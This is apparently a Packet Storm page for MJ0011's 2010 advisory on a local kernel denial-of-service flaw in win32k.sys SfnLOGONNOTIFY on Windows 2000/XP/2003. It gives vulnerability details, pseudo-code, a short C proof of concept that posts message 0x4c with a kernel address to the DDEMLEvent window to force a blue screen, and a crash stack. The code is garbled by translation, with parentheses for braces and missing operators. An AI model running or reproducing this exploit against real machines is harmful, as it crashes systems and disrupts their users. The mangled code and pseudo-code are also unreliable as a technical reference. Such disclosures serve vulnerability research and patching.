exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY Denial Of Service

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY Denial Of Service
Posted Apr 23, 2010
Authored by MJ0011

win32k.sys in Microsoft Windows 2000 / XP / 2003 suffers from a local kernel denial of service vulnerability related to SfnLOGONNOTIFY.

tags | exploit, denial of service, kernel, local
systems | windows
SHA-256 | 87330502340ae2d4d870ba5f24b26d6f4b4ea3616b2f8f96cd4f764ef765421e

Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY Denial Of Service

Change Mirror Download
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability 

Effect : Microsoft Windows 2000/XP/2003 full patch


Author:MJ0011
Published: 2010-04-22


Vulnerability Details:

Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process, which under the deal 2000/xp/2003
0x4c No. message, there will be a function called SfnLOGONNOTIFY, this function again when the wParam == 4/13/12
When the data directly from the lParam inside out, despite the use of the function of the SEH, but as long as the kernel passes the wrong address, will still lead to
BSOD

Pseudo-code:

if (wParam == 4 | | wParam == 13 | | wParam == 12)
(
v18 = * (_DWORD *) lParam;
v19 = * (_DWORD *) (lParam 4);
v20 = * (_DWORD *) (lParam 8);
v21 = * (_DWORD *) (lParam 12);

Exploit code:

# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");

getchar();

HWND hwnd = FindWindow ("DDEMLEvent", NULL);

if (hwnd == 0)
(
printf ("cannot find DDEMLEvent Window! \ n");
return 0;
)

PostMessage (hwnd, 0x4c, 0x4, 0x80000000);


return 0;
)

Common crash stack:

kd> kc

win32k! SfnLOGONNOTIFY
win32k! xxxDefWindowProc
win32k! xxxEventWndProc
win32k! xxxDispatchMessage
win32k! NtUserDispatchMessage
....

Windows 7/Vista no such problem

Thanks:

Thanks to my colleagues LYL to help me discovered this vulnerability
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close